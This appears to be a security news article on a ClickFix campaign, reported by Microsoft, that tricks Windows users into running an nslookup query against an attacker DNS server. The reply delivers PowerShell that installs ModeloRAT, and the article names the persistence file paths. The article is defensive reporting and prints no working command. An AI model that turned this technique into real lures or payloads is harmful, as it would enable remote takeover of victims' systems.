DNS-Powered ClickFix Attack Delivers PowerShell Malware and ModeloRAT to Windows Systems
scsecFebruary 18, 20262 Mins read 
New ClickFix Attack Uses DNS to Deliver PowerShell Payloads
Researchers at Microsoft have uncovered a novel ClickFix campaign in which threat actors are leveraging DNS queries to deliver malware, marking the first known use of DNS as a delivery channel in these social engineering attacks.
ClickFix attacks trick users into manually executing commands under the pretense of fixing errors, installing updates, or enabling functionality. This new variant represents a significant evolution in the technique.
How the DNS-Based ClickFix Attack Works
In this campaign, victims are instructed to run an nslookup command that queries an attacker-controlled DNS server instead of the system’s default DNS.
- The DNS server responds with a malicious PowerShell script embedded in the “NAME:” field of the DNS response.
- The victim’s system executes the script via the Windows command interpreter (cmd.exe), initiating the malware infection.
This method allows attackers to deliver second-stage payloads dynamically while blending in with normal DNS traffic, making detection more difficult.
Although the specific lure used to trick users is unclear, Microsoft notes that the command may be executed via the Windows Run dialog box. The DNS-based response then triggers the download of additional malware components.
Malware Components and Persistence
The payload ultimately delivers a ZIP archive containing a Python runtime executable and malicious scripts that perform reconnaissance on the infected system and network.
To maintain persistence, the malware creates:
%APPDATA%\WPy64-31401\python\script.vbs%STARTUP%\MonitoringService.lnkshortcut to launch the VBScript at startup
The final stage installs ModeloRAT, a remote access trojan (RAT) that gives attackers full control over compromised systems.
Unlike previous ClickFix campaigns, which primarily retrieved payloads via HTTP, this variant demonstrates how attackers can use DNS for command-and-control and staging of malware.
Evolution of ClickFix Attacks
ClickFix campaigns have rapidly evolved over the past year, experimenting with new delivery techniques, operating system targets, and payload types. Key trends include:
- Executing PowerShell or shell commands directly on target systems
- Using DNS queries to dynamically deliver payloads
- Leveraging AI LLM platforms such as ChatGPT, Grok, and Claude Artifact pages to promote fake guides
- Hijacking Microsoft accounts via OAuth apps (e.g., ConsentFix) to bypass multi-factor authentication
- Deploying JavaScript in browsers to hijack web applications or cryptocurrency transactions
These developments demonstrate attackers’ creativity in expanding social engineering tactics beyond traditional malware delivery channels.
Why This Attack Is Concerning
This DNS-based ClickFix attack shows how threat actors:
- Can evade traditional security measures by blending traffic with legitimate DNS queries
- Dynamically update payloads without requiring direct web downloads
- Combine social engineering with technical tricks to compromise users across platforms
- Target both local system security and web-based applications
As ClickFix attacks evolve, users are advised to exercise extreme caution before running commands on their devices, particularly when instructed by unverified guides or sponsored search results.
1 Comment
Leave a Reply
Related Articles
Fake Crypto Job Recruiters Trick Developers Into Installing Malware via Coding Challenges
Fake Job Recruiters Use Coding Challenges to Deploy Malware on Developers’ Systems...
287 Chrome Extensions Leak Browsing Data of 37.4 Million Users to Major Corporations
287 Chrome Extensions Leak Private Browsing Data of 37.4 Million Users A...
Hijacked Google Ads and Fake Claude AI Pages Used to Deliver MacSync Malware to macOS Users
ClickFix Campaign Uses Hijacked Google Ads and Fake Claude AI Guides to...
ZeroDayRAT: Telegram-Sold Spyware Enables Full Android and iOS Surveillance and Financial Theft
ZeroDayRAT Emerges as Powerful Cross-Platform Mobile Spyware Sold on Telegram Cybersecurity researchers...
“This DNS-based ClickFix attack is a serious warning for Windows users. Never run commands from unverified guides or sources, as attackers can deliver malware like ModeloRAT through seemingly harmless DNS queries.”